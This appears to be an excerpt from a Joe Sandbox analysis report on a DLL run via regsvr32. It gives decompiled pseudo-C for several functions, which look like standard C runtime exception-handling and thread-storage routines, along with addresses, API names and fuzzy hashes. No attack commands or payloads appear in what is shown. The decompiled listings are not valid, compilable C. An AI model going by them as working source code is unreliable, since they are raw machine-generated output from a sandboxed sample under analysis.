                                                                                                          				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                                                                          				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                          				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                          				goto 0x80003c31;
                                                                                                          				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
                                                                                                          				goto 0x80003d6d;
                                                                                                          				if (_t115[3] != 0) goto 0x80003cbe;
                                                                                                          				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
                                                                                                          				_t101 = _t115[8];
                                                                                                          				if (_t101 == 0) goto 0x80003c9e;
                                                                                                          				E00000001180002408(_t109);
                                                                                                          				if (_t101 != 0) goto 0x80003cbe;
                                                                                                          				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
                                                                                                          				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
                                                                                                          				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
                                                                                                          				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
                                                                                                          				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
                                                                                                          				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                                                                          				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
                                                                                                          				E0000000118000241C(_t111);
                                                                                                          				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
                                                                                                          				_v32 = _a64 & 0x000000ff;
                                                                                                          				_v40 = _a56;
                                                                                                          				_v48 = _a48;
                                                                                                          				_v56 = _t115;
                                                                                                          				 *0x80016370(_t158);
                                                                                                          				goto 0x80003d72;
                                                                                                          				_v32 = _a56;
                                                                                                          				_v40 = _a48;
                                                                                                          				_v48 = _a64;
                                                                                                          				_v56 = _t115;
                                                                                                          				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
                                                                                                          				return 1;
                                                                                                          			}



















                                                                                                          0x180003b5c
                                                                                                          0x180003b5f
                                                                                                          0x180003b63
                                                                                                          0x180003b67
                                                                                                          0x180003b6b
                                                                                                          0x180003b75
                                                                                                          0x180003b78
                                                                                                          0x180003b7e
                                                                                                          0x180003b81
                                                                                                          0x180003b84
                                                                                                          0x180003b89
                                                                                                          0x180003b8e
                                                                                                          0x180003ba4
                                                                                                          0x180003bac
                                                                                                          0x180003bb0
                                                                                                          0x180003bb6
                                                                                                          0x180003bc0
                                                                                                          0x180003bc4
                                                                                                          0x180003bd2
                                                                                                          0x180003bd8
                                                                                                          0x180003be2
                                                                                                          0x180003bec
                                                                                                          0x180003bfa
                                                                                                          0x180003c04
                                                                                                          0x180003c08
                                                                                                          0x180003c14
                                                                                                          0x180003c1c
                                                                                                          0x180003c25
                                                                                                          0x180003c2b
                                                                                                          0x180003c37
                                                                                                          0x180003c3c
                                                                                                          0x180003c43
                                                                                                          0x180003c45
                                                                                                          0x180003c4d
                                                                                                          0x180003c57
                                                                                                          0x180003c61
                                                                                                          0x180003c6c
                                                                                                          0x180003c71
                                                                                                          0x180003c7a
                                                                                                          0x180003c88
                                                                                                          0x180003c8a
                                                                                                          0x180003c8e
                                                                                                          0x180003c90
                                                                                                          0x180003c9c
                                                                                                          0x180003caa
                                                                                                          0x180003cb8
                                                                                                          0x180003cc4
                                                                                                          0x180003cca
                                                                                                          0x180003cd3
                                                                                                          0x180003cd5
                                                                                                          0x180003cdd
                                                                                                          0x180003cdf
                                                                                                          0x180003cf2
                                                                                                          0x180003d09
                                                                                                          0x180003d18
                                                                                                          0x180003d20
                                                                                                          0x180003d27
                                                                                                          0x180003d2c
                                                                                                          0x180003d32
                                                                                                          0x180003d3f
                                                                                                          0x180003d51
                                                                                                          0x180003d5f
                                                                                                          0x180003d63
                                                                                                          0x180003d68
                                                                                                          0x180003d8c

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                          • String ID: csm$csm
                                                                                                          • API String ID: 851805269-3733052814
                                                                                                          • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                          • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                          • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                          • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 30%
                                                                                                          			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                                                                                                          				void* _t76;
                                                                                                          				void* _t83;
                                                                                                          				void* _t84;
                                                                                                          				intOrPtr _t101;
                                                                                                          				intOrPtr _t103;
                                                                                                          				void* _t113;
                                                                                                          				void* _t118;
                                                                                                          				void* _t130;
                                                                                                          				long long _t133;
                                                                                                          				intOrPtr* _t135;
                                                                                                          				signed long long _t144;
                                                                                                          				void* _t150;
                                                                                                          				signed long long _t154;
                                                                                                          				void* _t156;
                                                                                                          				long long _t158;
                                                                                                          				intOrPtr* _t159;
                                                                                                          				void* _t161;
                                                                                                          				void* _t162;
                                                                                                          				signed long long _t166;
                                                                                                          				void* _t170;
                                                                                                          				intOrPtr _t171;
                                                                                                          				void* _t173;
                                                                                                          				void* _t174;
                                                                                                          				void* _t176;
                                                                                                          				void* _t178;
                                                                                                          				void* _t180;
                                                                                                          				intOrPtr* _t181;
                                                                                                          
                                                                                                          				_t130 = __rax;
                                                                                                          				 *((long long*)(_t161 + 8)) = __rbx;
                                                                                                          				 *((long long*)(_t161 + 0x10)) = _t158;
                                                                                                          				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                                                                          				_t162 = _t161 - 0x40;
                                                                                                          				_t159 = __rcx;
                                                                                                          				_t181 = __r9;
                                                                                                          				_t174 = __rdx;
                                                                                                          				E00000001180004584(_t76, __r8);
                                                                                                          				_t171 =  *((intOrPtr*)(__r9 + 8));
                                                                                                          				_t135 =  *((intOrPtr*)(__r9 + 0x38));
                                                                                                          				_t178 =  *__r9 - _t171;
                                                                                                          				_t103 =  *((intOrPtr*)(__r9 + 0x48));
                                                                                                          				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
                                                                                                          				 *((long long*)(_t162 + 0x30)) = __rcx;
                                                                                                          				 *((long long*)(_t162 + 0x38)) = __r8;
                                                                                                          				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
                                                                                                          				_t154 = __r8 + __r8;
                                                                                                          				if (_t178 - _t130 < 0) goto 0x80002b9e;
                                                                                                          				if (_t178 - _t130 >= 0) goto 0x80002b9e;
                                                                                                          				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
                                                                                                          				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
                                                                                                          				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
                                                                                                          				if (_t113 < 0) goto 0x80002ba5;
                                                                                                          				if (_t113 <= 0) goto 0x80002b9e;
                                                                                                          				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
                                                                                                          				if ( *0x800164f8 == 0) goto 0x80002b5b;
                                                                                                          				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
                                                                                                          				_t83 =  *0x800164f8();
                                                                                                          				r8d = 1;
                                                                                                          				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
                                                                                                          				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
                                                                                                          				r9d =  *_t159;
                                                                                                          				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
                                                                                                          				_t133 =  *((intOrPtr*)(_t181 + 0x28));
                                                                                                          				 *((long long*)(_t162 + 0x20)) = _t133;
                                                                                                          				__imp__RtlUnwindEx();
                                                                                                          				E00000001180004580(_t84);
                                                                                                          				goto 0x80002ada;
                                                                                                          				goto 0x80002c5d;
                                                                                                          				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
                                                                                                          				goto 0x80002c4e;
                                                                                                          				_t144 = _t174 + _t174;
                                                                                                          				if (_t178 - _t133 < 0) goto 0x80002c4c;
                                                                                                          				_t118 = _t178 - _t133;
                                                                                                          				if (_t118 >= 0) goto 0x80002c4c;
                                                                                                          				r10d =  *(_t159 + 4);
                                                                                                          				r10d = r10d & 0x00000020;
                                                                                                          				if (_t118 == 0) goto 0x80002c21;
                                                                                                          				r9d = 0;
                                                                                                          				if (_t101 == 0) goto 0x80002c1c;
                                                                                                          				r8d = r9d;
                                                                                                          				_t166 = _t159 + _t159;
                                                                                                          				if (_t156 - _t133 < 0) goto 0x80002c14;
                                                                                                          				if (_t156 - _t133 >= 0) goto 0x80002c14;
                                                                                                          				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
                                                                                                          				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
                                                                                                          				r9d = r9d + 1;
                                                                                                          				if (r9d - _t101 < 0) goto 0x80002be4;
                                                                                                          				if (r9d != _t101) goto 0x80002c58;
                                                                                                          				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
                                                                                                          				if (_t156 != _t133) goto 0x80002c4c;
                                                                                                          				if (r10d != 0) goto 0x80002c58;
                                                                                                          				goto 0x80002c4c;
                                                                                                          				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
                                                                                                          				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
                                                                                                          				 *((long long*)(_t166 + _t171))();
                                                                                                          				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
                                                                                                          				return 1;
                                                                                                          			}






























                                                                                                          0x180002a84
                                                                                                          0x180002a84
                                                                                                          0x180002a89
                                                                                                          0x180002a8e
                                                                                                          0x180002a9c
                                                                                                          0x180002aa0
                                                                                                          0x180002aa3
                                                                                                          0x180002aac
                                                                                                          0x180002aaf
                                                                                                          0x180002ab4
                                                                                                          0x180002abb
                                                                                                          0x180002abf
                                                                                                          0x180002ac6
                                                                                                          0x180002aca
                                                                                                          0x180002ad0
                                                                                                          0x180002ad5
                                                                                                          0x180002adc
                                                                                                          0x180002ae4
                                                                                                          0x180002aee
                                                                                                          0x180002afb
                                                                                                          0x180002b06
                                                                                                          0x180002b11
                                                                                                          0x180002b24
                                                                                                          0x180002b26
                                                                                                          0x180002b28
                                                                                                          0x180002b31
                                                                                                          0x180002b3b
                                                                                                          0x180002b4b
                                                                                                          0x180002b55
                                                                                                          0x180002b5f
                                                                                                          0x180002b6b
                                                                                                          0x180002b77
                                                                                                          0x180002b7e
                                                                                                          0x180002b85
                                                                                                          0x180002b8a
                                                                                                          0x180002b8e
                                                                                                          0x180002b93
                                                                                                          0x180002b99
                                                                                                          0x180002ba0
                                                                                                          0x180002ba7
                                                                                                          0x180002bb0
                                                                                                          0x180002bb3
                                                                                                          0x180002bba
                                                                                                          0x180002bc4
                                                                                                          0x180002bce
                                                                                                          0x180002bd1
                                                                                                          0x180002bd3
                                                                                                          0x180002bd7
                                                                                                          0x180002bdb
                                                                                                          0x180002bdd
                                                                                                          0x180002be2
                                                                                                          0x180002be4
                                                                                                          0x180002be7
                                                                                                          0x180002bf2
                                                                                                          0x180002bfc
                                                                                                          0x180002c07
                                                                                                          0x180002c12
                                                                                                          0x180002c14
                                                                                                          0x180002c1a
                                                                                                          0x180002c1f
                                                                                                          0x180002c27
                                                                                                          0x180002c2c
                                                                                                          0x180002c31
                                                                                                          0x180002c33
                                                                                                          0x180002c3b
                                                                                                          0x180002c3f
                                                                                                          0x180002c49
                                                                                                          0x180002c52
                                                                                                          0x180002c7a

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                          • String ID: csm$f
                                                                                                          • API String ID: 2395640692-629598281
                                                                                                          • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                          • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                          • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                          • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                          • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                          • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                          • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                          • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 85%
                                                                                                          			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                          				signed int _t27;
                                                                                                          				signed int _t28;
                                                                                                          				signed int _t29;
                                                                                                          				signed int _t30;
                                                                                                          				signed int _t31;
                                                                                                          				signed int _t42;
                                                                                                          				signed int _t43;
                                                                                                          				signed int _t44;
                                                                                                          				signed int _t46;
                                                                                                          				void* _t51;
                                                                                                          
                                                                                                          				_a8 = __rbx;
                                                                                                          				_a16 = __rsi;
                                                                                                          				_t27 = __ecx & 0x0000001f;
                                                                                                          				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
                                                                                                          				if (sil >= 0) goto 0x8000782e;
                                                                                                          				E0000000118000BC4C(_t27, _t51);
                                                                                                          				_t28 = _t27 & 0xfffffff7;
                                                                                                          				goto 0x80007885;
                                                                                                          				_t42 = 0x00000004 & dil;
                                                                                                          				if (_t42 == 0) goto 0x80007849;
                                                                                                          				asm("dec eax");
                                                                                                          				if (_t42 >= 0) goto 0x80007849;
                                                                                                          				E0000000118000BC4C(_t28, _t51);
                                                                                                          				_t29 = _t28 & 0xfffffffb;
                                                                                                          				goto 0x80007885;
                                                                                                          				_t43 = dil & 0x00000001;
                                                                                                          				if (_t43 == 0) goto 0x80007865;
                                                                                                          				asm("dec eax");
                                                                                                          				if (_t43 >= 0) goto 0x80007865;
                                                                                                          				E0000000118000BC4C(_t29, _t51);
                                                                                                          				_t30 = _t29 & 0xfffffffe;
                                                                                                          				goto 0x80007885;
                                                                                                          				_t44 = dil & 0x00000002;
                                                                                                          				if (_t44 == 0) goto 0x80007885;
                                                                                                          				asm("dec eax");
                                                                                                          				if (_t44 >= 0) goto 0x80007885;
                                                                                                          				if ((dil & 0x00000010) == 0) goto 0x80007882;
                                                                                                          				E0000000118000BC4C(_t30, _t51);
                                                                                                          				_t31 = _t30 & 0xfffffffd;
                                                                                                          				_t46 = dil & 0x00000010;
                                                                                                          				if (_t46 == 0) goto 0x8000789f;
                                                                                                          				asm("dec eax");
                                                                                                          				if (_t46 >= 0) goto 0x8000789f;
                                                                                                          				E0000000118000BC4C(_t31, _t51);
                                                                                                          				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                          			}













                                                                                                          0x1800077fc
                                                                                                          0x180007801
                                                                                                          0x180007810
                                                                                                          0x180007818
                                                                                                          0x18000781d
                                                                                                          0x180007824
                                                                                                          0x180007829
                                                                                                          0x18000782c
                                                                                                          0x180007833
                                                                                                          0x180007836
                                                                                                          0x180007838
                                                                                                          0x18000783d
                                                                                                          0x18000783f
                                                                                                          0x180007844
                                                                                                          0x180007847
                                                                                                          0x180007849
                                                                                                          0x18000784d
                                                                                                          0x18000784f
                                                                                                          0x180007854
                                                                                                          0x18000785b
                                                                                                          0x180007860
                                                                                                          0x180007863
                                                                                                          0x180007865
                                                                                                          0x180007869
                                                                                                          0x18000786b
                                                                                                          0x180007870
                                                                                                          0x180007876
                                                                                                          0x18000787d
                                                                                                          0x180007882
                                                                                                          0x180007885
                                                                                                          0x180007889
                                                                                                          0x18000788b
                                                                                                          0x180007890
                                                                                                          0x180007897
                                                                                                          0x1800078b5

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _set_statfp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1156100317-0
                                                                                                          • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                          • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                          • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                          • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                          • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                          • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                          • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                          • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value
                                                                                                          • String ID:
                                                                                                          • API String ID: 3702945584-0
                                                                                                          • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                          • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                          • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                          • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value
                                                                                                          • String ID:
                                                                                                          • API String ID: 3702945584-0
                                                                                                          • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                          • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                          • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                          • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 68%
                                                                                                          			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                                                          				void* _t19;
                                                                                                          				void* _t27;
                                                                                                          				void* _t36;
                                                                                                          				void* _t39;
                                                                                                          				void* _t42;
                                                                                                          				void* _t43;
                                                                                                          				void* _t45;
                                                                                                          				void* _t46;
                                                                                                          				void* _t52;
                                                                                                          				void* _t54;
                                                                                                          				void* _t56;
                                                                                                          				void* _t59;
                                                                                                          
                                                                                                          				_t27 = _t45;
                                                                                                          				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                                                          				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                                                          				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                                                          				_t43 = _t27 - 0x3f;
                                                                                                          				_t46 = _t45 - 0xc0;
                                                                                                          				if ( *__rcx == 0x80000003) goto 0x800038a4;
                                                                                                          				E00000001180002D40(_t27);
                                                                                                          				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                                                          				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
                                                                                                          				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                                                          				E00000001180002D40(_t27);
                                                                                                          				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
                                                                                                          				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
                                                                                                          				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                                                          				if ( *__rcx == 0xe0434352) goto 0x800038c3;
                                                                                                          				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                                                          				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                                                          				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                                                          				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                                                          				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                                                          				if (_t19 == 0) goto 0x800038c3;
                                                                                                          				return _t19;
                                                                                                          			}















                                                                                                          0x180003800
                                                                                                          0x180003803
                                                                                                          0x180003807
                                                                                                          0x18000380b
                                                                                                          0x18000381a
                                                                                                          0x18000381e
                                                                                                          0x180003834
                                                                                                          0x180003836
                                                                                                          0x18000383b
                                                                                                          0x180003848
                                                                                                          0x18000384c
                                                                                                          0x180003855
                                                                                                          0x18000385e
                                                                                                          0x180003867
                                                                                                          0x180003870
                                                                                                          0x180003874
                                                                                                          0x180003884
                                                                                                          0x18000388c
                                                                                                          0x180003891
                                                                                                          0x180003896
                                                                                                          0x18000389b
                                                                                                          0x1800038a2
                                                                                                          0x1800038be

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                          • String ID: MOC$RCC
                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                          • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                          • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                                          • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                          • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 32%
                                                                                                          			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                          				void* __rdi;
                                                                                                          				void* __rsi;
                                                                                                          				void* __rbp;
                                                                                                          				intOrPtr _t183;
                                                                                                          				signed int _t187;
                                                                                                          				signed int _t194;
                                                                                                          				signed int _t199;
                                                                                                          				intOrPtr _t208;
                                                                                                          				void* _t210;
                                                                                                          				signed char _t211;
                                                                                                          				void* _t261;
                                                                                                          				signed long long _t262;
                                                                                                          				long long _t267;
                                                                                                          				long long _t269;
                                                                                                          				void* _t270;
                                                                                                          				long long _t272;
